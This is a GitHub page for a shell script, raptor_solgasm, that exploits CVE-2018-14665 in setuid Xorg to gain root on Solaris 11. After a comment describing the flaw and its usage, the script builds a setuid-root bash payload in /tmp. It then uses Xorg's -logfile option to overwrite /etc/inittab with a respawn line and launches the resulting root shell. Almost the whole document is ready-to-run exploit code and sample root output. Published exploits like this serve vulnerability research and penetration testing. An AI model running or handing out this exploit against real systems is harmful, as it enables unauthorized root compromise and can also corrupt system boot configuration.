Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
exploits/solaris/raptor_solgasm
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
70 lines (65 sloc)
2.46 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # | |
| # raptor_solgasm - xorg-x11-server LPE via Solaris inittab | |
| # Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info> | |
| # | |
| # A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission | |
| # check for -modulepath and -logfile options when starting Xorg. X server | |
| # allows unprivileged users with the ability to log in to the system via | |
| # physical console to escalate their privileges and run arbitrary code under | |
| # root privileges (CVE-2018-14665). | |
| # | |
| # "In video games, this is what they call respawning" -- Nick Sax | |
| # | |
| # This exploit targets /etc/inittab in order to escalate privileges to root | |
| # on Solaris 11 (no need to be connected to a physical console). Messing with | |
| # inittab is considerably dangerous and you may trash your system, however the | |
| # other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't | |
| # work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING! | |
| # | |
| # See also: | |
| # https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm | |
| # | |
| # Usage: | |
| # raptor@stalker:~$ chmod +x raptor_solgasm | |
| # raptor@stalker:~$ ./raptor_solgasm | |
| # [...] | |
| # Now please be patient for a few minutes... | |
| # [...] | |
| # To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab | |
| # -rw-r--r-- 1 root staff 13870 nov 24 22:01 /etc/inittab | |
| # -rw-r--r-- 1 root sys 967 nov 24 20:01 /etc/inittab.old | |
| # -rwsrwxrwx 1 root root 1249080 nov 24 22:05 /tmp/pwned | |
| # root@stalker:/etc# id | |
| # uid=0(root) gid=0(root) | |
| # | |
| # Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): | |
| # Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5] | |
| # Oracle Solaris 11 SPARC [untested] | |
| # | |
| echo "raptor_solgasm - xorg-x11-server LPE via Solaris inittab" | |
| echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>" | |
| # prepare the payload | |
| cat << EOF > /tmp/solgasm | |
| cp /bin/zsh /tmp/pwned # fallback in case gcc is not available | |
| echo "main(){setuid(0);setgid(0);system(\"/bin/bash\");}" > /tmp/pwned.c | |
| gcc /tmp/pwned.c -o /tmp/pwned | |
| chmod 4777 /tmp/pwned | |
| EOF | |
| chmod +x /tmp/solgasm | |
| # trigger the bug | |
| PWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1) | |
| cd /etc | |
| Xorg -fp "${PWN}::respawn:/tmp/solgasm" -logfile inittab :1 & | |
| sleep 5 | |
| pkill Xorg | |
| # run the setuid shell | |
| echo | |
| echo "Now please be patient for a few minutes..." | |
| echo | |
| until [ -u /tmp/pwned ]; do sleep 1; done | |
| echo "To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab" | |
| ls -l /etc/inittab* | |
| ls -l /tmp/pwned | |
| sleep 1 | |
| /tmp/pwned |